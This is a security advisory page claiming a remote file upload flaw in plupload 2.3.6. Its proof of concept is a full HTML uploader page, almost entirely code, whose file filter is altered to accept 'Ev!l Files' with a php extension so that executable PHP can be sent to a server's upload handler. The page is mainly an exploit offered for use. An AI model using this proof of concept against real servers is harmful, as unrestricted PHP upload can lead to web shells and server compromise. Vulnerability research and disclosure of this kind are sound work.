plupload 2.3.6 Remote File Upload Vulnerability

2018.01.21
dz indoushka (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

============================================================================================================================ | # Title : plupload 2.3.6 Remote File Upload Vulnerability | | # Author : indoushka | | # Telegram : @indoushka | | # Tested on : windows 10 Fr V.(Pro) | | # Vendor : http://www.plupload.com/download/ | | # Dork : n/a | ============================================================================================================================ poc : save as anything.html <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"/> <title>Plupload - Custom example</title> <!-- production --> <script type="text/javascript" src="../js/plupload.full.min.js"></script> <!-- debug <script type="text/javascript" src="../js/moxie.js"></script> <script type="text/javascript" src="../js/plupload.dev.js"></script> --> </head> <body style="font: 13px Verdana; background: #eee; color: #333"> <h1>Custom example</h1> <p>Shows you how to use the core plupload API.</p> <div id="filelist">Your browser doesn't have Flash, Silverlight or HTML5 support.</div> <br /> <div id="container"> <a id="pickfiles" href="javascript:;">[Select files]</a> <a id="uploadfiles" href="javascript:;">[Upload files]</a> </div> <br /> <pre id="console"></pre> <script type="text/javascript"> // Custom example logic var uploader = new plupload.Uploader({ runtimes : 'html5,flash,silverlight,html4', browse_button : 'pickfiles', // you can pass an id... container: document.getElementById('container'), // ... or DOM Element itself url : 'upload.php', flash_swf_url : '../js/Moxie.swf', silverlight_xap_url : '../js/Moxie.xap', filters : { max_file_size : '10mb', mime_types: [ {title : "Image files", extensions : "jpg,gif,png"}, {title : "Ev!l Files", extensions : "php"} ] }, init: { PostInit: function() { document.getElementById('filelist').innerHTML = ''; document.getElementById('uploadfiles').onclick = function() { uploader.start(); return false; }; }, FilesAdded: function(up, files) { plupload.each(files, function(file) { document.getElementById('filelist').innerHTML += '<div id="' + file.id + '">' + file.name + ' (' + plupload.formatSize(file.size) + ') <b></b></div>'; }); }, UploadProgress: function(up, file) { document.getElementById(file.id).getElementsByTagName('b')[0].innerHTML = '<span>' + file.percent + "%</span>"; }, Error: function(up, err) { document.getElementById('console').appendChild(document.createTextNode("\nError #" + err.code + ": " + err.message)); } } }); uploader.init(); </script> </body> </html> Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top